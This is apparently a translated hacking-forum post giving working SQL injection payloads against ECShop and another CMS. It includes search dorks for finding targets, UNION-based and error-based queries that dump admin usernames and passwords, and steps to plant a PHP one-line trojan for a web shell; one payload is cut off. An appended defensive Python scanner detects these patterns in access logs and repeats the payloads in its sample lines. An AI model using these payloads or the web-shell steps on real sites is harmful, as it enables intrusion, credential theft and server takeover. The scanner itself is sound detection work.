Last night, while leafing through a technical book, I got an idea and found this ECShop vulnerability.
Search keyword: powered by ecshop
Method one:
Basic payload:
user.php?act=order_query&order_sn=* union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
Variant payload:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
Add the payload to the site's back-end URL and press Enter to dump the account name and password; then remove the payload, add /admin and press Enter to go straight into the back-end.
Getting a shell is simple: find "Library item management" (庫項目管理), then choose "Shipping method" (配送的方式) and insert a PHP one-line trojan at the very bottom of the code; if that does not work, use the PHP trojan's prepared code instead!
Then save. The one-liner's path is: http://www.xxx.org/myship.php ; open "ASP+PHP兩用Shell.html", fill in the address, click "Environment variables", and once that succeeds click "Upload file" to get a shell.
Method two
Keyword:
inurl:index.php?ac=article&at=read&did=
Default back-end: adminsoft/index.php or admin/
Injection point (dumps the table prefix; e.g. cm_admin...... means the prefix is cm, and you must substitute it yourself in the three payloads that follow):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Dump the username:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Dump the password:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele
(search Baidu for the rest)
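The injection strings in both methods share recognisable traits: UNION/SELECT, reads of information_schema or the admin table, the floor(rand()) error-based trick, and comment terminators, sometimes double-URL-encoded (%2527) or wrapped in the base64 `encode` parameter. As an added example that is not part of the original post, the following Python scanner decodes those layers and flags matching requests in web-server access logs; the log format, indicator list and sample log lines are constructed assumptions to tune against real traffic.

```python
import re
import base64
from urllib.parse import urlsplit, unquote

# Indicators drawn from the injection strings above (UNION-based, admin-table
# reads, error-based floor(rand()), comment terminators). Constructed for this
# example; tune against your own traffic before relying on it.
SQLI_RE = re.compile("|".join([
    r"\bunion\b.{0,40}\bselect\b|\bfrom\s+\w*_admin_(user|member)\b",
    r"information_schema|floor\s*\(\s*rand\s*\(",
    r"/\*|#$|%23$",
]), re.IGNORECASE | re.DOTALL)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decoded_views(value):
    """Yield the value, successive URL-decodings (%2527 -> %27 -> ') and base64 decodings."""
    v = value
    for _ in range(3):
        yield v
        try:  # the serialized 'encode' parameter carries its payload as base64
            yield base64.b64decode(v, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            pass
        nxt = unquote(v)
        if nxt == v:
            break
        v = nxt

def suspicious_params(url):
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, val = pair.partition("=")  # no '+'->space, keeps base64 intact
        if any(SQLI_RE.search(view) for view in decoded_views(val)):
            hits.append(name)
    return hits

def scan_log(lines):
    """Return (client_ip, path, [suspicious params]) for each flagged request."""
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, url, _status = m.groups()
        if params := suspicious_params(url):
            findings.append((ip, urlsplit(url).path, params))
    return findings

# Constructed sample log lines: one benign, three mirroring the patterns above.
_ENC = base64.b64encode(b'a:1:{s:4:"attr";a:1:{s:19:"1\') union select 1#";s:1:"1";}}').decode()
SAMPLE_LOG = [
    '10.0.0.4 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?keywords=union+jack HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /user.php?act=order_query&order_sn=*%20union%20select%201,concat(user_name,0x7c,password)%20from%20ecs_admin_user/* HTTP/1.1" 200 512',
    f'10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?encode={_ENC} HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 500 0',
]
```

Run scan_log over a real access log and alert on the returned tuples; a 500 status on a flagged request is a useful secondary signal for the error-based variant.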